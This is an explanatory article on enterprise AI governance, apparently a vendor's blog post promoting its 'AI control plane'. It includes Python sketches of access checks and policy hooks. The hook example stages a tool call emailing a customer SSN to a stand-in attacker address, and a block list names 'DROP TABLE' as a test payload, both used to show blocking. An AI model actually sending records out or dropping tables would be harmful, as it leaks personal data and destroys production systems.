AI governance
How an organization controls what its AI tools are allowed to see, do, and decide on its behalf. It's the layer that decides which employees can use which AI agents, what data those agents can reach, what actions they can take, and how all of that gets observed, logged, and audited.
AI governance is one of the top concerns inside the enterprise. AI usage has exploded, moving faster than companies' ability to govern it. Claude, ChatGPT, Cursor, Copilot, and a dozen tools nobody approved are being used in production work. Many of them can read Google Drive, query internal databases, and act inside Salesforce. Most of the organizations deploying them have no consistent way to say which employees are using which tools, against which data, or under whose authority. Closing that gap, without killing the adoption the board is asking executives to drive, is the goal of AI governance.
A note on terminology
AI governance has historically referred to the discipline of governing model training: bias mitigation, fairness audits, ethics review boards, and the regulatory compliance that comes with building foundation models. Frameworks like the NIST AI Risk Management Framework and ISO/IEC 42001 sit largely in this tradition, and IBM's overview of AI governance is a good summary of that framing. That work remains real for the organizations training models. This piece is about the version of governance most enterprises actually face today: how to control the AI tools their employees are already using.
The rest of this piece walks through the version of AI governance that matters in 2026: what its four core building blocks are, why the category has become urgent, and how leading organizations are assembling those blocks into a single architecture, the AI control plane, that lets them roll AI out without sacrificing the company's governance controls.
The building blocks of AI governance
When you look at what organizations are putting in place, and the tooling categories emerging to serve them, four functions show up repeatedly. Together they describe the working surface of AI governance.
Visibility
You can't govern what you can't see. The first job is a continuous, accurate inventory of every AI tool, agent, and connection in use across the company. That includes the sanctioned tools, the bottom-up adoptions from individual teams, the personal accounts employees connected to enterprise data, and the MCP servers and agents proliferating below the level of a procurement cycle. Most enterprises that run an honest audit discover dozens of tools they didn't know existed, a problem now widely referred to as shadow AI.
Identity and access
AI agents act in one of two modes. Sometimes they act on behalf of a specific person, like a developer running Cursor or a financial analyst using Claude CoWork. Other times they act autonomously, like OpenClaw, running as background workers and scheduled jobs that execute without a human in the loop. In either mode, an agent will by default use whatever credentials and access it can reach to accomplish the task it's been given. That default is what makes identity and access the load-bearing layer of governance. The question for every action is whether the identity behind it is explicit or implicit.
Explicit means the agent inherits a specific user's identity through SSO when one is present, or carries its own scoped service identity when operating autonomously. That identity holds a permission set scoped by team, role, and purpose. Implicit means the agent has not had access granted intentionally, but has instead inherited access based on what tools it's able to discover and use.
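The distinction can be made concrete in a few lines. This is a minimal sketch, not any specific product's API; the names `AgentIdentity` and `is_allowed` are illustrative. The key design choice is that implicit identities fail closed: access an agent merely discovered is never treated as access it was granted.

```python
from dataclasses import dataclass, field

@dataclass
class AgentIdentity:
    subject: str                       # "user:jane@acme.com" (via SSO) or "service:report-bot"
    explicit: bool                     # True only if access was granted intentionally
    scopes: set[str] = field(default_factory=set)  # permissions scoped by team, role, and purpose

def is_allowed(identity: AgentIdentity, required_scope: str) -> bool:
    # An implicit identity is denied regardless of what it can reach.
    if not identity.explicit:
        return False
    return required_scope in identity.scopes

analyst = AgentIdentity("user:jane@acme.com", explicit=True,
                        scopes={"crm:read", "drive:read"})
print(is_allowed(analyst, "crm:read"))    # True: explicitly granted
print(is_allowed(analyst, "crm:write"))   # False: outside the granted scope
```

The same check covers both modes: a user-delegated agent carries the user's scopes, an autonomous agent carries its own service identity's scopes, and anything that arrived by discovery rather than grant is rejected.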
Policy and security
Access decides who's allowed to call. Policy decides what's allowed to flow through the call. Access is content-blind: it evaluates the envelope (who is calling, what resource, what verb) and stops there. Policy is content-aware: it inspects the actual prompt, response, and tool-call arguments at runtime, and catches the abuses access structurally cannot see. An agent can hold legitimate write access to an email tool and still need to be blocked from sending customer records to an attacker, because the abuse lives in the payload, not the envelope.
For that inspection to function as a real control rather than a documented intention, it has to be executable. A rule that says "AI tools should not access customer PII outside the EU" is not a control if it lives in a Confluence page and gets enforced through training. It's a control when the inspection layer evaluates every prompt, response, and tool call against it and blocks the ones that violate it. The threats it's inspecting for include data exfiltration, prompt injection, over-broad tool calls, and access to systems an agent shouldn't be touching. The primitive that makes this enforcement possible at the agent itself is the agent hook, a lifecycle handler that fires on every prompt and tool call. Real-time inspection with active blocking is the bar.
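A hedged sketch of what an agent hook looks like in practice, assuming a hypothetical framework where a handler runs before every tool call and raising blocks the call. The function name and the toy PII pattern are illustrative; a real policy engine would use richer detection than a regex. The point is the shape: the agent holds legitimate access to the email tool, but the hook catches the abuse in the payload rather than the envelope.

```python
import re

# Toy content rule: a pattern matching US-style SSNs in tool-call arguments.
PII_PATTERN = re.compile(r"\b\d{3}-\d{2}-\d{4}\b")

class PolicyViolation(Exception):
    """Raised to block a tool call that violates policy."""

def pre_tool_call_hook(tool_name: str, arguments: dict) -> None:
    # Fires before every tool call: inspect the actual payload, not the envelope.
    payload = " ".join(str(v) for v in arguments.values())
    if PII_PATTERN.search(payload):
        raise PolicyViolation(f"blocked {tool_name}: PII detected in payload")

# The agent is allowed to send email, but not to exfiltrate customer records.
try:
    pre_tool_call_hook("send_email", {"to": "ext@attacker.example",
                                      "body": "customer SSN: 123-45-6789"})
except PolicyViolation as err:
    print(err)
```

A clean call to the same tool passes through untouched, which is what keeps enforcement from becoming a blanket lockdown.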
Observability and audit
Governance has to produce evidence: every AI interaction, every tool call, every decision, captured in a form that can be reviewed against a policy and exported into the SIEM and warehouse the security and compliance teams already use. Observability is also where the political dimension of AI governance plays out. Leadership wants to know whether the AI investment is working, and observability is what produces the answer.
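What "evidence" means in practice is a structured record per interaction. The field names below are illustrative, not a standard schema; real deployments would match the schema their SIEM expects. Newline-delimited JSON is a common interchange shape because most SIEMs and warehouses ingest it directly.

```python
import datetime
import json

def audit_event(identity: str, tool: str, decision: str, reason: str) -> str:
    """Serialize one AI interaction as an exportable audit record."""
    record = {
        "timestamp": datetime.datetime.now(datetime.timezone.utc).isoformat(),
        "identity": identity,   # who, or what service identity, acted
        "tool": tool,           # what was called
        "decision": decision,   # "allow" or "block"
        "reason": reason,       # which policy or grant drove the decision
    }
    return json.dumps(record)

print(audit_event("user:jane@acme.com", "crm.query", "allow", "scope:crm:read"))
```

The same records that satisfy an auditor also answer the leadership question: aggregate them by team and tool and you have the adoption report.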
These four functions (visibility, identity and access, policy and security, observability and audit) are the working surface of enterprise AI governance. Notice what isn't on the list: training data review, model fairness audits, ethics committees. Those things still matter to the small number of organizations that build the models. They aren't the governance levers available to the organizations consuming them.
Why AI governance is critical now
Three forces are pushing the redefinition into the open.
- Inside enterprises, the pressure to become AI-native is coming from both directions at once. From the top down, boards and CEOs are mandating AI adoption as a strategic priority and measuring executives on it. From the bottom up, employees are reaching for Claude, ChatGPT, Cursor, and Copilot to do their day jobs whether or not procurement has signed off. The result is that AI is no longer a pilot; it's embedded in daily workflow for engineering, sales, finance, legal, and operations. The governance question stopped being theoretical because the usage stopped being theoretical.
- The protocols connecting AI to enterprise systems, Model Context Protocol most prominently, have made the access layer concrete. AI agents have gone from answering questions to implementing answers. AI can call tools, query databases, post to Slack, modify records in Salesforce. The interface between AI and the rest of the business now has a name and a shape, which means it can be governed at that interface. A year ago, governance was an abstraction. Today it's a gateway. We've written more about that surface in our piece on MCP governance.
- The risk of doing nothing is no longer hypothetical. The PocketOS case is illustrative: a lack of AI controls let an agent drop the company's production database, taking millions in revenue with it. That is the headline-grade version of a failure mode that is now showing up in less visible ways across the enterprise, alongside data leaks through consumer AI tools, active prompt injection attacks on agent systems, and rising regulatory pressure under the EU AI Act. The conversation in the C-suite has moved from "what if something happens" to "what are we doing about the things already happening."
Put together, these forces land on executive teams across the board: the CTO, CIO, CISO, or newly minted Chief AI Officer tasked with delivering the AI transformation.
A maturity model for AI governance
Most enterprises don't move from "no AI governance" to "fully governed" in a single quarter. The arc usually runs through four stages, and it's useful to know where you are.
The progression matters because it's how budget and capability accumulate. Stage 1 is the default. Stage 4 is the operating state most boards are expecting within twelve to eighteen months.
The solution: the AI control plane
The architecture for doing this is what we and others have begun calling the AI control plane. The name borrows from infrastructure, where Kubernetes, service meshes, and Cloudflare have control planes for the same reason: a system that governs the rest of a system needs a name.
An AI control plane is the governing layer between every AI agent in an organization and every system those agents are allowed to reach. It unifies connection, identity, policy enforcement, and observability so that every prompt, response, and tool call flows through a single controlled path. Visibility, identity, policy, and observability stop being four separate initiatives bought from four different vendors and become four properties of the same architectural layer.
The reason that integration matters, and the reason point tools fall short on their own, is that each component sees only part of the interaction. The structural problem looks like this:
- Visibility tools can inventory what exists, but can't block anything.
- Identity and access controls evaluate the envelope, but are blind to what flows through it.
- Policy inspection catches abuse in the payload, but only if every call is routed through it.
- Observability records what happened, but only after it happened.
Each is necessary. None is sufficient. The control plane is what you get when these layers are designed to see each other.
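The single controlled path can be sketched as one function that runs the four checks in sequence. Everything here is illustrative (the inventory, grants, and toy content rule are stand-ins), but the structure is the point: unknown tools fail closed, the envelope is checked before the payload, and every outcome, allowed or blocked, lands in the same audit log.

```python
from dataclasses import dataclass

@dataclass
class ToolCall:
    identity: str
    tool: str
    payload: str

INVENTORY = {"crm.query", "email.send"}          # visibility: the known-tool inventory
GRANTS = {("user:jane", "crm.query")}            # identity: explicit (identity, tool) grants
BLOCKLIST = ("DROP TABLE",)                      # policy: a toy content-inspection rule
AUDIT_LOG: list[tuple[str, str, str]] = []       # observability: every decision recorded

def control_plane(call: ToolCall) -> bool:
    def audit(decision: str, reason: str) -> bool:
        AUDIT_LOG.append((call.tool, decision, reason))
        return decision == "allow"
    if call.tool not in INVENTORY:
        return audit("block", "unregistered tool")     # unknown tools fail closed
    if (call.identity, call.tool) not in GRANTS:
        return audit("block", "no explicit grant")     # envelope check
    if any(bad in call.payload for bad in BLOCKLIST):
        return audit("block", "policy violation")      # content check
    return audit("allow", "ok")

print(control_plane(ToolCall("user:jane", "crm.query", "SELECT name FROM accounts")))  # True
print(control_plane(ToolCall("user:jane", "crm.query", "DROP TABLE accounts")))        # False
```

Because all four checks share one path, the audit log is complete by construction: there is no way for a call to be allowed or blocked without leaving a record, which is exactly the property the point-tool approach can't guarantee.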
The other reason the framing matters is that it dissolves the false choice most enterprises think they're making. Companies that respond to AI by locking everything down kill adoption. Companies that don't lock anything down get incidents. Treated as separate problems run by separate teams, governance and enablement are in permanent tension. Treated as a single architecture, they stop being in tension. The thing that rolls AI out is the thing that keeps it safe.
We've written a longer reference architecture for the AI control plane here, including the components, the vendor landscape, and what a mature deployment looks like. The short version is that this is the shape of the answer to the governance question most enterprises are actually asking when they search for it.
What to do with this
If you're an executive who landed on this page from a search for "AI governance," and what you're really trying to figure out is how to roll AI out across your organization without losing control of it, the most useful next step isn't picking a product. It's drawing the architecture: where AI lives in your stack today, what data it touches, who's using it, and which of the four functions above you can answer for and which you can't.
Speakeasy is building the AI control plane. We started with managing MCP access, because connecting AI to data is particularly dangerous, and we've been extending across the four functions since. If you're wrestling with this, we'd be glad to talk.
AI governance, properly understood, isn't a question of whether your model is fair. It's a question of whether the AI in your organization is connected, controlled, secured, and observed, and whether you can prove it.